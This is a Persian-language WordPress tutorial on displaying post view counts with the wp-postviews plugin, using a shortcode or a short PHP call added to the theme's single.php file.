      در انتهایی هر مطلب می‌توانید با قرار دادن کد کوتاه افزونه میزان بازدید را نمایش دهید. می‌توانید از تعداد بازدید: ۱۵۸ یا تعداد بازدید: ۰ استفاده کنید. عدد ۵۴ در کد کوتاه شناسه مطلب است که هر مطلب شناسه خاص خودش را دارد که راحت‌ترین روش به دست آوردن شناسه طبق عکس زیر بردن موس بر روی اسم مطلب است.

      اما استفاده از این روش دردسر بزرگی مثل اضافه کردن کد کوتاه به تک‌تک صفحات را دارد. برای حل این مشکل می‌توانید کد بخش پایین را طبق دستورالعمل به قالب خودتان اضافه کنید تا بازدید به‌صورت خودکار در سایت نمایش داده شود.

      نمایش بازدید توسط کد:
      هر قالب شامل فایل‌های مختلفی است مثلاً فایل (Page.php) مخصوص نمایش صفحات سایت است و یا (Single.php) مخصوص نمایش ادامه مطالب است. در هرکدام از صفحاتی که قصد نمایش بازدید را دارید آن صفحه را بازکنید، مثلاً ما می‌خواهیم در بخش ادامه مطلب سایت تعداد بازدید را نمایش دهیم، برای همین فایل (Single.php) قالب را باز می‌کنیم که معمولاً در اکثر قالب‌ها در این مسیر یافت می‌شود.
      wp-content/themes/<Name Ghaleb>/single.php
      فایل را بازکنید و دنبال کدی مشابه کد زیر بگردید.
      ۱ <?php while (have_posts()) : the_post(); ?>
      حالا در پایین همین کد هرجایی که قصد نمایش تعداد بازدید را دارید کد زیر را قرار دهید.
      ۱ <?php if(function_exists('the_views')) { the_views(); } ?>
      برای اینکه تشخیص بدهیم کد را دقیقاً کجا باید قرار بدهیم نیاز به کمی دانش برنامه‌نویسی هست که بخشی را که بالای مقالات و یا پایین مقالات است را تشخیص بدهیم، به‌هرحال در فیلم آموزشی روشی را توضیح داده‌ایم که اگر کد نویسی این مورد را هم بلد نیستید به‌راحتی از همین چند خط شروع کنید.

      جمع‌بندی:
      یکی دیگر از روش‌های نمایش آمار بازدید از مطالب سایت استفاده از افزونه wp-postviews است، این افزونه بدون فشار به سرور آمار دقیقی از آمار نمایش صفحات سایت در اختیار شما قرار می‌دهد.